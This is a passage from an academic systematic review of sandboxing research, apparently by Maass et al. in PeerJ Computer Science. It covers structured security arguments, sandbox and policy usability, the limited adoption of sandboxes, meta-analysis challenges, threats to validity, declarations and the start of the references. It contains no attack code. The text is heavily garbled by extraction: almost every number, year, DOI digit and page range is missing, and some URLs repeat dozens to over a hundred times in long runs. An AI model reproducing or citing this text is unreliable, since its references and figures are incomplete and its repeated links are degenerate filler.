zhang et al. ( ) oakland cfi zhang & sekar ( ) usenix cfi, sfi niu & tan ( ) ccs diversity homescu et al. ( ) ccs other (os) moshchuk, wang & liu ( ) ccs virtualization nikolaev & back ( ) sosp cfi criswell, dautenhahn & adve ( ) oakland web mickens ( ) oakland structure their arguments by using the framework to describe their specific sandbox without performing explicit comparisons. • structured abstracts (hartley, ; haynes et al., ) are used in many medical journals to summarize key results and how those results were produced. these abstracts have the benefit of being quick to read while increasing the retention of information, largely thanks to the use of structure to guide authors in precisely summarizing their work. • papers could provide a table summarizing their contributions and the important design or implementation details that reflect the contribution. all of these approaches provide the reader with data missing in ad hoc arguments: a specific map from the claims made about a sandbox to evidence that justifies the claim maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. has been met. they are also necessarily qualitative, but as we saw earlier, arguments are often used where more rigorous approaches are currently intractable. we believe that adding structure to these arguments is a reasonable advancement of the state of practice in sandbox validation. sandbox and policy usability sandbox and policy usability are concerns of interest to the following stakeholders: practitioners that must correctly use sandboxes to improve the security postures of their systems and users that must work with sandboxed applications. some security researchers do attempt to make their sandboxes more usable by providing policy management or reducing requirements on the user, but usability is definitely not a focus of any of the papers in our sample. our data shows that, with very few exceptions, sandbox researchers thoroughly evaluate the performance of their sandboxes. why is there focus on this practical concern but not on usability? we observe that a focus on performance evaluation is partially motivated by the fact that overhead is relatively easy to quantify, but we also saw many cases where researchers were explicitly concerned with whether or not a sandbox was too resource intensive for adoption. the latter is a reasonable concern; szekeres et al. ( ) pointed out that many mitigations for memory corruption vulnerabilities are not adopted because performance concerns outweigh protection merits. while the idea that performance is an important adoption concern is compelling and likely reflects reality, we cannot correlate performance with the adoption of the sandboxes in our set. we cannot find a correlation because the sandboxes and their techniques in our set remain almost entirely unadopted. we only found four cases where sandboxes in our set were either directly adopted or where the techniques they evaluate are clearly implemented in a different but adopted sandbox. a lack of adoption is present even for techniques where performance and applicability have been improved over multiple decades (e.g., sfi). three of the adopted sandboxes were created by the industry itself or by entities very closely tied to it: google nacl was designed with the intention of adopting it in google chrome in the short term (yee et al., ; sehr et al., ) and the paper on systrace was published with functioning open source implementations for most unix-like operating systems (provos, ). while the case for adoption is weaker, cells (andrus et al., ) is a more advanced design than one vmware developed in parallel (berlind, ), although the sandboxes both aim to partition phones into isolated compartments using virtualization (e.g., one for work and one for personal use). more recently, microsoft has stated that visual studio will ship with an exploit mitigation that we believe is equivalent to what the research community calls cfi (hogg, ). a third party analysis supports this belief, however the uncovered implementation details differ from the techniques implemented in published research (tang, ). we argue that the need to evaluate the usability of our sandboxes is evidenced by the observation that performance and security evaluation are not sufficient to drive adoption. usability is of particular concern in cases where the sandbox requires developers without maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. security expertise ( ) to re-architect applications to apply the sandbox and/or ( ) to develop a security policy. in practice, it is quite common for developers without a security focus to apply sandboxes, particularly java’s. in fact, usability issues have factored into widely publicized vulnerabilities in how sandboxes were applied to google chrome and adobe reader as well as the many vulnerable applications of the java sandbox (coker et al., ). in all of these cases applying the sandbox is a relatively manual process where it is difficult for the applier to be sure he is fully imposing the desired policy and without missing relevant attack surfaces. these usability issues have caused vulnerabilities that have been widely exploited to bypass the sandboxes. we call on the community to evaluate the following usability aspects of their sandboxes where appropriate: • the intended users are capable of writing policies for the component(s) to be sandboxed that are neither over- or under-privileged. • policy enforcement mechanisms can be applied without missing attack surfaces that compromise the sandbox in the targeted component(s). • source code transformations (e.g., code re-writing or annotations) do not substantially burden future development or maintenance. • the sandbox, when applied to a component, does not substantially alter a typical user’s interactions with the sandboxed component. ideally many of these points would be evaluated during user studies with actual stakeholders. however, we believe that we can make progress on all of these points without the overhead of a full user study, particularly because we are starting from a state where no usability evaluations are performed. for example, authors can describe correct ways to determine what privileges in their policy language a component needs or even provide tools to generate policies to mitigate the risks presented by under- and over-privileged policies. similarly, tooling can be provided to help users install policy enforcement mechanisms or check that manual applications of a mechanism are correct. sandbox developers can transform or annotate representative open source applications and use repository mining (http://msrconf.org) to determine how sandbox alternations are affected by code evolution present in the repository (kagdi, collard & maletic, ; yan, menarini & griswold, ; mauczka et al., ; stuckman & purtilo, ). finally, a summary of how the sandbox qualitatively changes a user’s experience with a sandboxed component would provide a gauge for how much the sandbox burdens end-users. enabling meta-analysis we believe a key contribution of this work is the use of multi-disciplinary and systematic methodologies for drawing conclusions about a large body of security techniques. in this section, we discuss the generalizability of our methodology and suggest other areas to which it can be applied. then, we discuss some challenges that we faced when doing this research and suggest changes that would address these challenges. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://msrconf.org http://dx.doi.org/ . /peerj-cs. generalizability of methodology the methodology employed in this paper is based on two research approaches: qualitative content analysis and systematic literature reviews. qualitative content analysis is primarily used in the humanities and social sciences. systematic literature reviews were first applied to medical studies and are used primarily in empirical fields. the differences between sandboxing papers are bigger than the differences between studies of a particular cancer treatment. in addition, sandboxing papers do not fit into the “native” domains of either approach—their primary contributions are designs, techniques, and implementations. the result of these differences is that most literature reviews and systemizations in computing are done in an ad hoc manner. our computing research is worthy of a more rigorous approach and we think the methodology applied in this paper can and should be applied to other topics. in fact, any topic of active research where the primary contributions is an engineered artifact, but without a clear and precise definition, would be amenable to our approach. these topics span computing research from software engineering (e.g., service oriented architecture, concurrent computation models) to systems (e.g., green computing, no instruction set computing) to human–computer interaction (e.g., gui toolkits, warning science). meta-analysis challenges and suggested solutions in our experience, the biggest roadblock standing in the way of applying the same techniques to other segments of the research community lies in the difficulty involved in collecting analyzable metadata about papers. we experienced several fixable issues: • the major publishers in computer science—ieee, acm, and usenix—do not provide publicly available mechanisms to collect metadata and either rate limit or outright ban scraping. in our case, the painstaking process of collecting and curating analyzable in at least one case acm provided a copy of their digital library for scraping (bergmark, phempoonpanich & zhao, ) metadata across several sources limited our ability to explore hypotheses about our dataset’s papers and their relationships to publications not in the set. • the metadata is limited and contains little semantic content—typically the metadata includes the authors, title, data, and doi, but little else. if abstracts and keywords were easier to harvest we could have more systematically derived topics of interest within the sandboxing community. • links to papers on publisher websites use internal identifiers (e.g., http://dl.acm.org/ citation.cfm?id= ) instead of doi. this makes it difficult to reference papers across publisher repositories. • conference websites have inconsistent layouts, which increases the difficulty of data collection. we believe easier access to this data would have allowed us to draw more conclusions about how sandboxing papers are related and how the sandboxing landscape has evolved over time. for example, we explored the idea of using a more developed citation graph maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dx.doi.org/ . /peerj-cs. than fig. to trace the lineage of sandboxing techniques, but found the required resource expenditures were outside of our means. this data may provide support for explanations regarding the lack of advancement in security validation practices (e.g., by showing an emphasis on a different but important dimension of advancement). these points are important to understand how we got to the current state of practice, thus improving our ability to recognize and advance means for enhancing our results. on another data collection point, we averaged about min per paper to code the data necessary to answer our research questions. while we do not claim that our research questions are of universal interest to the sandboxing community, we did observe that papers that answer all or most of the questions in the abstract are often clearly written throughout and easy to interpret. a small minority of sandboxing papers have far less specific abstracts. in these cases, the papers often took double the average time to comprehend and interpret. it may be useful to strive to clearly answer questions like ours in future papers to show practitioners the value sandbox researchers bring to the table. threats to validity due to the complexity of the text and concepts we are interpreting, there is some risk that other coders would assign quotes to different codes. different codes will change the results, but we believe this risk is mitigated through our tests of the coding frame and by our efforts to select clear quotes. furthermore, the correlative nature of our results ensures that a few code divergences will not dramatically change the analysis’s outcomes. the primary risk is that we are missing relevant quotes that add codes to our dataset. this is typically mitigated in qca by fully segmenting the text, but we decided against that strategy because of the very large data set we studied and irrelevance of most of the text to our goals. we did search pdfs for relevant keywords we observed were commonly linked to specific codes throughout the process (e.g., “proof ”, “available” to find the availability of sandbox artifacts for evaluation, “experiment” to signal a case study or benchmark, etc.) to decrease the odds of missing a code. while this does mitigate the risk, it is still likely that our results under-approximate the state of the sandboxing landscape. conclusion we systematically analyzed the sandboxing landscape as it is represented by five top-tier security and systems conferences. our analysis followed a multidisciplinary strategy that allowed us to draw conclusions backed by rigorous interpretations of qualitative data, statistics, and graph analysis. based on our results, we conclude that the sandbox research community will benefit from the use of structured arguments in support of security claims and the validation of sandbox and policy usability. we suggested lightweight ways to move forward in achieving these goals. our data also shows that there is a dearth of science regarding the management of security policies for sandboxes, although we did not discuss this gap in depth. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this material is based upon work supported by the us department of defense through the office of the assistant secretary of defense for research and engineering (asd(r&e)) under contract hq - -d- and the national security agency under lablet con- tract h - -c- . any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of asd (r&e) or nsa. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: us department of defense: hq - -d- . national security agency: h - -c- . competing interests the authors declare there are no competing interests. author contributions • michael maass conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • adam sales analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, reviewed drafts of the paper. • benjamin chung analyzed the data, performed the computation work, reviewed drafts of the paper. • joshua sunshine conceived and designed the experiments, performed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: we have supplied all our data in the supplemental dataset files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references abadi m, budiu m, erlingsson ú, ligatti j. . control-flow integrity principles, implementations, and applications. in: proceedings of the th acm conference on computer and communications security (ccs ’ ). new york: acm, – . maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. akritidis p. . cling: a memory allocator to mitigate dangling pointers. in: usenix security (usenix security’ ). berkeley: usenix association, – . available at http://dl.acm.org/ citation.cfm?id= . . akritidis p, cadar c, raiciu c, costa m, castro m. . preventing memory error exploits with wit. in: ieee symposium on security and privacy (sp ’ ). washington, d.c.: ieee computer society, – . akritidis p, costa m, castro m, hand s. . baggy bounds checking: an efficient and backwards-compatible defense against out-of-bounds errors. in: usenix security (ssym’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . al ameiri f, salah k. . evaluation of popular application sandboxing. in: international conference for internet technology and secured transactions (icitst), . washington, d.c.: ieee, – . andrus j, dall c, van’t hof a, laadan o, nieh j. . cells: a virtual mobile smartphone architecture. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . bandhakavi s, bisht p, madhusudan p, venkatakrishnan vn. . candid: preventing sql injection attacks using dynamic candidate evaluations. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . barnes jm. . software architecture evolution. phd dissertation, carnegie mellon university. berelson b. . content analysis in communication research. glencoe: free press. bergmark d, phempoonpanich p, zhao s. . scraping the acm digital library. in: sigir forum. . – . berlind d. . vmware shows android based virtual machines. available at http://www. informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual- machines/d/d-id/ ? (accessed april ). bhatkar s, sekar r, duvarney dc. . efficient techniques for comprehensive protection from memory error exploits. in: usenix security (ssym’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . budgen d, brereton p. . performing systematic literature reviews in software engineering. in: international conference on software engineering (icse ’ ). new york: acm, – . cappos j, dadgar a, rasley j, samuel j, beschastnikh i, barsan c, krishnamurthy a, anderson t. . retaining sandbox containment despite bugs in privileged memory-safe code. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . castro m, costa m, harris t. . securing software by enforcing data-flow integrity. in: usenix symposium on operating systems design and implementation (osdi) (osdi ’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . castro m, costa m, martin j-p, peinado m, akritidis p, donnelly a, barham p, black r. . fast byte-granularity software fault isolation. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . chandra r, kim t, shah m, narula n, zeldovich n. . intrusion recovery for database-backed web applications. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? 